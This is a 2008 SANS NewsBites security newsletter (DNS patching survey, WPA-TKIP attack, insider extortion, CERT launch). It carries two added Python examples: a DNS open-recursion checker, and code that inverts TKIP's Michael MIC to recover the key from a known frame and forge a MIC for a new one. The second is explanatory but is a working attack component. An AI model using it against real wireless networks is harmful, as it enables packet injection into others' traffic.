********************** Sponsored By Ounce Labs, Inc. ********************
Outsourcing is a proven strategy to reduce costs and increase value, but careful planning is required to build stringent software security requirements into contracts and to ensure that those requirements are met. Download this report for detailed data on how experienced outsourcers are putting in place effective processes to drive the risk out of outsourcing. http://www.sans.org/info/35229
Study Finds Some DNS Servers Still Not Patched Against Cache Poisoning Flaw (November 10, 2008)
A recent survey of Domain Name System (DNS) servers found that despite widespread press coverage of a critical DNS cache poisoning vulnerability earlier this year (the flaw disclosed by Dan Kaminsky in July 2008, for which the fix is source port randomization), 25 percent of servers that allow open recursion have not yet been patched. According to the study, 45 percent of administrators responding to the survey said they lack the necessary resources to address the DNS vulnerability, and 30 percent said they do not know enough about DNS to do so. The survey also shows that 90 percent of DNS servers are running recent versions of the Berkeley Internet Name Domain, or BIND 9; there has also been a significant decrease in the use of Microsoft DNS Server, which is not highly secure. One disappointment is the low rate of adoption of DNSSEC, "a security protocol that allows DNS queries and answers to be digitally signed and authenticated;" those statistics could change as .gov domains in the US are required to implement DNSSEC by the end of 2009. -http://www.gcn.com/online/vol1_no1/47524-1.html?topic=security -http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9119724&source=rss_topic17 -http://dns.measurement-factory.com/surveys/200810.html [Editor's Note (Northcutt): They can be as disappointed as they want to about the rate of DNSSEC adoption, but it is hard to do. Success in security depends on either automating the fix or making it really easy for the user. ]
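The survey's headline number is about servers that answer recursive queries for anyone on the Internet. The following is an added example (not code from the article or from the Measurement Factory survey) that builds a minimal RD=1 query by hand, decodes the 12-byte response header, and classifies the server as open-recursive, refusing, or closed. The query name, the transaction id and the two canned response packets are constructed for the example; the `probe()` function sends the same query over UDP and should only be run against servers you are responsible for. It tests open recursion only; whether a resolver randomizes its source ports (the actual cache poisoning fix) has to be judged from many observed queries, for example with the DNS-OARC port test.

```python
"""Open-recursion check for a DNS server (added example, not the article's code)."""
import os
import socket
import struct


def build_query(name: str, txid: int, rd: bool = True) -> bytes:
    """Build a DNS A/IN query for `name` with the given transaction id."""
    flags = 0x0100 if rd else 0x0000          # RD bit: ask the server to recurse
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)   # QTYPE=A, QCLASS=IN


def parse_header(resp: bytes) -> dict:
    """Decode the DNS header into its flag bits and section counts."""
    if len(resp) < 12:
        raise ValueError("response shorter than a DNS header")
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", resp[:12])
    return {
        "id": txid,
        "qr": bool(flags & 0x8000),     # response bit
        "aa": bool(flags & 0x0400),     # authoritative answer
        "rd": bool(flags & 0x0100),     # recursion desired (echoed from query)
        "ra": bool(flags & 0x0080),     # recursion available
        "rcode": flags & 0x000F,
        "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar,
    }


def classify(query_txid: int, resp: bytes) -> str:
    """Classify the reply to an RD=1 query for a name the server is not authoritative for.

    'open-recursive': RA set, NOERROR and answer records returned
    'refused'       : RCODE 5 (REFUSED), recursion denied to this client
    'closed'        : recursion not offered or no answer data
    'mismatch'      : not a response to our query (wrong id or QR clear)
    """
    h = parse_header(resp)
    if h["id"] != query_txid or not h["qr"]:
        return "mismatch"
    if h["rcode"] == 5:
        return "refused"
    if h["ra"] and h["rcode"] == 0 and h["ancount"] > 0:
        return "open-recursive"
    return "closed"


def probe(server: str, name: str = "www.example.com", timeout: float = 3.0) -> str:
    """Send one RD=1 query over UDP to `server` and classify the reply (network)."""
    txid = struct.unpack("!H", os.urandom(2))[0]   # random id, as a resolver should use
    query = build_query(name, txid)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(query, (server, 53))
        data, _ = s.recvfrom(4096)
    return classify(txid, data)


# Constructed sample responses so the classifier can be exercised offline.
TXID = 0x1234
_QUESTION = build_query("www.example.com", TXID)[12:]
# Open resolver: QR=1 RD=1 RA=1 NOERROR, one A record (name compressed to offset 12).
OPEN_RESPONSE = (struct.pack("!HHHHHH", TXID, 0x8180, 1, 1, 0, 0) + _QUESTION
                 + b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, 4)
                 + bytes([93, 184, 216, 34]))
# Properly restricted server: QR=1 RD=1 RCODE=5 (REFUSED), no answer section.
REFUSED_RESPONSE = struct.pack("!HHHHHH", TXID, 0x8105, 1, 0, 0, 0) + _QUESTION

if __name__ == "__main__":
    print(classify(TXID, OPEN_RESPONSE))      # open-recursive
    print(classify(TXID, REFUSED_RESPONSE))   # refused
```

A server you run for your own customers should come back as "refused" or "closed" when queried from outside the networks it serves; "open-recursive" from an unexpected vantage point is the configuration the survey is counting.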
Researchers Publish Paper on Breaking WPA TKIP (November 6 & 10, 2008)
Two German university researchers have discovered a combination of techniques that could allow an attacker to compromise Wi-Fi Protected Access (WPA) encryption in less than 15 minutes. The attack does not result in the encryption key being discovered. Rather, the technique allows attackers "to decrypt packets and inject packets with custom content." Martin Beck and Erik Tews are presenting their findings at the PacSec 2008 conference in Tokyo this week. The attack targets WPA's Temporal Key Integrity Protocol (TKIP). -http://www.securityfocus.com/news/11537 -http://www.heise-online.co.uk/security/Security-experts-reveal-details-of-WPA-hack--/news/111922 -http://dl.aircrack-ng.org/breakingwepandwpa.pdf [Editor's Note (Ullrich): Although the attack is rather limited, it highlights the fact that WPA and TKIP were meant to serve as a transitional fix for older hardware. WPA2 is the "real fix". And from Raul Siles at Internet Storm Center: This new research opens the door to new WPA/TKIP attacks and future attack enhancements, so it is time to start applying and planning the appropriate security countermeasures to remove or mitigate this and similar future threats: Update to WPA2/AES as soon as you can! Because the vulnerability is in TKIP, both WPA and WPA2 can be affected. The attack affects WPA2 if configured with TKIP because WPA2 allows both AES and TKIP (while WPA only allows TKIP). -http://isc.sans.org/diary.html?storyid=5315]
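The injection half of the attack rests on a property of TKIP's message integrity code, Michael, that the linked paper relies on: Michael is a keyed checksum, not a one-way function, so once a frame's plaintext and its MIC are known (which is what the decryption half delivers for an ARP frame), the 64-bit MIC key can be computed by running Michael backwards. The following is an added example, not code from the Beck/Tews paper or from aircrack-ng. Michael is implemented here from the IEEE 802.11i description as this editor recalls it (64-bit key as two little-endian 32-bit words, 0x5a plus four to seven zero bytes of padding, the four-step block function); verify it against the standard's test vectors before relying on it. The MIC key, addresses and ARP payload in `demo()` are constructed.

```python
"""Michael (TKIP MIC) and its inverse: plaintext + MIC gives the MIC key.
Added example, not code from the paper or the aircrack-ng project."""
import os
import struct

MASK = 0xFFFFFFFF


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _ror(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK


def _xswap(x):
    """Swap the bytes within each 16-bit half of x."""
    return ((x & 0xFF00FF00) >> 8) | ((x & 0x00FF00FF) << 8)


def _block(l, r):
    """One Michael block function; every step (xor with rotation, modular add) is invertible."""
    r ^= _rol(l, 17); l = (l + r) & MASK
    r ^= _xswap(l);   l = (l + r) & MASK
    r ^= _rol(l, 3);  l = (l + r) & MASK
    r ^= _ror(l, 2);  l = (l + r) & MASK
    return l, r


def _block_inv(l, r):
    """Exact inverse of _block: undo the steps in reverse order."""
    l = (l - r) & MASK; r ^= _ror(l, 2)
    l = (l - r) & MASK; r ^= _rol(l, 3)
    l = (l - r) & MASK; r ^= _xswap(l)
    l = (l - r) & MASK; r ^= _rol(l, 17)
    return l, r


def _pad(msg: bytes) -> bytes:
    """Append 0x5a, then 4..7 zero bytes so the total length is a multiple of 4."""
    n = len(msg) + 1
    return msg + b"\x5a" + b"\x00" * (4 + (-n) % 4)


def michael(key: bytes, msg: bytes) -> bytes:
    """Compute the 8-byte Michael MIC of msg under the 8-byte key."""
    l, r = struct.unpack("<II", key)
    for (m,) in struct.iter_unpack("<I", _pad(msg)):
        l ^= m
        l, r = _block(l, r)
    return struct.pack("<II", l, r)


def recover_key(msg: bytes, mic: bytes) -> bytes:
    """Run Michael backwards from a known (msg, mic) pair to the key."""
    l, r = struct.unpack("<II", mic)
    words = [m for (m,) in struct.iter_unpack("<I", _pad(msg))]
    for m in reversed(words):
        l, r = _block_inv(l, r)
        l ^= m
    return struct.pack("<II", l, r)


def tkip_mic_input(da: bytes, sa: bytes, priority: int, msdu: bytes) -> bytes:
    """The bytes TKIP feeds to Michael: DA, SA, priority, three zero bytes, MSDU."""
    return da + sa + bytes([priority, 0, 0, 0]) + msdu


def demo():
    """Constructed scenario: attacker knows one ARP frame's plaintext and MIC."""
    mic_key = os.urandom(8)                     # the AP-to-station MIC key (constructed)
    da = bytes.fromhex("ffffffffffff")          # broadcast ARP request
    sa = bytes.fromhex("001122334455")
    arp = (b"\x00\x01\x08\x00\x06\x04\x00\x01" + sa + bytes([192, 168, 1, 1])
           + b"\x00" * 6 + bytes([192, 168, 1, 2]))
    plain = tkip_mic_input(da, sa, 0, arp)
    mic = michael(mic_key, plain)               # what decryption of the frame yields
    recovered = recover_key(plain, mic)         # Michael inverted over the known plaintext
    forged = tkip_mic_input(da, sa, 0, arp[:-4] + bytes([192, 168, 1, 99]))
    return recovered == mic_key, michael(recovered, forged)   # valid MIC for a new frame


if __name__ == "__main__":
    ok, forged_mic = demo()
    print("MIC key recovered:", ok, "forged MIC:", forged_mic.hex())
```

The forged MIC still has to be sent in a frame whose TKIP sequence counter the receiver will accept and with keystream the attacker has recovered, which is why the paper needs the decryption step first; Michael's weakness is the reason the 802.11i designers added the MIC-failure countermeasures (a report per failure, and a rekey after two failures within a minute) that slow the attack down rather than prevent it.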
New Apple Exec Ordered to Stop Work for Possible Non-Compete Violation (November 8 & 10, 2008)
A judge in New York has issued a preliminary injunction ordering Apple's new executive in charge of the iPhone and the iPod to "immediately cease his employment with Apple Inc. until further order" because of a potential violation of an agreement with his former employer, IBM. Mark Papermaster left IBM for Apple in October; the lawsuit alleges his move violates a non-compete clause in his contract that stipulates that he would not work for a competitor within a year of leaving his position at IBM. The crux of the issue is whether Apple and IBM are business competitors. -http://www.latimes.com/business/la-fi-briefs8-2008nov08,0,6090160.story -http://www.crn.com/hardware/212001584
ARRESTS, CHARGES, CONVICTIONS & SENTENCES
Former Sysadmin Arrested for Alleged Extortion (November 10, 2008)
A systems administrator who had recently been laid off from Third Avenue Management, a New York-based mutual fund company, has been arrested for allegedly threatening to damage his former employer's servers if the company did not meet his demands. Viktor Savtyrev was one of 10 employees who lost their jobs on November 5. All were given a severance package, but several days later, Savtyrev allegedly sent email messages to several people still with the company, including the company's general counsel, saying he was "not satisfied with the terms" of his severance package and threatening to damage the computer systems unless they gave him more money and provided him with extended medical coverage and "excellent" job references. In subsequent communications, Savtyrev allegedly said he would get help attacking the servers from friends in Belarus and that he had already placed several back doors on the company's computer systems. Savtyrev was arrested at his home in Old Bridge, NJ. -http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9119792&source=rss_topic17 -http://www.nj.com/news/index.ssf/2008/11/old_bridge_computer_tech_charg.html [Editor's Note (Skoudis): This case is a great illustration for management about the importance of thorough processes for removing employees' access from computer systems after job termination. Further, for recently dismissed sysadmin employees, enterprises should conduct some check of the systems they operated to make sure they left behind nothing nefarious. (Ullrich): I guess his request for excellent job references will no longer be good much. ]
Woman Gets Four-Year Sentence for Identity Theft and Credit Card Fraud (November 7, 2008)
Kimberly Ann Mavis was sentenced to four years in federal prison without the possibility of parole for her role in an identity fraud scheme. Mavis and a co-conspirator, Jerry Bagby, gained unauthorized access to the customer database of Premier Bank in Overland Park, Kansas and used the purloined information to open credit card accounts in other people's names. Mavis and Bagby used those cards to purchase expensive items, which they later resold for cash. In August, Mavis pleaded guilty to computer fraud, conspiracy, aggravated identity theft and credit card fraud. Bagby pleaded guilty to aggravated identity theft and credit card fraud; he is awaiting sentencing. -http://www.infozine.com/news/stories/op/storiesView/sid/31730/
Former Inmate Arrested for Accessing Prison Network (November 6, 7 & 8, 2008)
Ireland Gets First Computer Emergency Response Team (November 10, 2008)
Ireland's first national Computer Security Incident Response Team was launched on Monday, November 10. The Irish Reporting and Information Security Service, known as IRISS, is a not-for-profit company that aims to assist businesses, organisations and individuals to better protect their computer and network systems from threats posed by Internet attacks, hackers and computer viruses. Founded by SANS NewsBites editor Brian Honan, IRISS will provide a range of free services to Irish businesses and consumers in relation to information security issues to help counter the security threats posed to Irish businesses and the Irish Internet space. IRISS's services are built on the WARP (Warning Advice & Reporting Point, http://www.warp.gov.uk) model and are provided by a dedicated core of volunteers drawn from Ireland's top Internet security experts, with funding for the project coming from private industry, including the SANS Institute. -http://www.businessworld.ie/cgi-bin/printer_friendly?a=2345192 -http://www.iriss.ie -http://www.businessworld.ie/livenews.htm?a=2345192;s=rollingnews.htm -http://iriss.ie/iriss/ [Editor's Note (Schultz): Starting an incident response team is one of the most challenging tasks an information security professional can undertake. I wish Brian all the success in the world. ]
Computer Misuse Arrests Doubled In Japan During 2007 (November 10, 2008)
AT&T Experiments with Downloading Limits for Broadband Customers (November 6, 2008)
AT&T has started a test program in Reno, Nevada that places a limit on the amount of downloading and uploading its broadband users are permitted each month. The amount allowed varies depending upon the type of account users have. Users who exceed their allotted limits will receive warning letters for the first two months of overages; after that, they will be charged US $1 per extra gigabyte. AT&T says the pilot program is an attempt to come up with a solution to the problem of a very small percentage of users who consume an inordinate portion of bandwidth. -http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2008/11/06/BU7G13UV7I.DTL&tsp=1 [Editor's Note (Pescatore): Hmmm, if my math is right, if I pay for 6 Mbps connectivity, if I used it 24 hours per day for a month, I could download almost 2,000 GB. The ATT plan would give me the first 80 GB free and then I would pay $1,920/month for the rest? If I only get 80 GB in a month, then I think I'm only getting 240 Kbs connectivity or so. This type of logic is like offering cellphone service pricing where you get unlimited minutes of connectivity but only 5,000 words per month.]
************************************************************************* The Editorial Board of SANS NewsBites
Eugene Schultz, Ph.D., CISM, CISSP is CTO of High Tower Software and the author/co-author of books on Unix security, Internet security, Windows NT/2000 security, incident response, and intrusion detection and prevention. He was also the co-founder and original project manager of the Department of Energy's Computer Incident Advisory Capability (CIAC).
John Pescatore is Vice President at Gartner Inc.; he has worked in computer and network security since 1978.
Ron Dick headed the National Infrastructure Protection Center (NIPC) at the FBI and is the incoming President of the InfraGard National Members Alliance - with 22,000 members.
Stephen Northcutt founded the GIAC certification and currently serves as President of the SANS Technology Institute, a post graduate level IT Security College, www.sans.edu.
Johannes Ullrich is Chief Technology Officer of the Internet Storm Center.
Howard A. Schmidt served as CSO for Microsoft and eBay and as Vice-Chair of the President's Critical Infrastructure Protection Board.
Will Pelgrin is Chief Information Security Officer of New York State, chair of the Multi-State Information Sharing and Analysis Center and co-chair of the National ISAC Council.
Ed Skoudis is co-founder of Intelguardians, a security research and consulting firm, and author and lead instructor of the SANS Hacker Exploits and Incident Handling course.
Tom Liston is a Senior Security Consultant and Malware Analyst for Intelguardians, a handler for the SANS Institute's Internet Storm Center, and co-author of the book Counter Hack Reloaded.
Dr. Eric Cole is an instructor, author and fellow with The SANS Institute. He has written five books, including Insider Threat and he is a senior Lockheed Martin Fellow.
Mason Brown is one of a very small number of people in the information security field who have held a top management position in a Fortune 50 company (Alcoa). He is leading SANS' global initiative to improve application security.
Marcus J. Ranum built the first firewall for the White House and is widely recognized as a security products designer and industry innovator.
Mark Weatherford, CISSP, CISM, is Executive Officer of the California Office of Information Security and Privacy Protection.
Alan Paller is director of research at the SANS Institute.
Clint Kreitner is the founding President and CEO of The Center for Internet Security.
Brian Honan is an independent security consultant based in Dublin, Ireland.
Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription, (and for free posters) or to update a current subscription, visit http://portal.sans.org/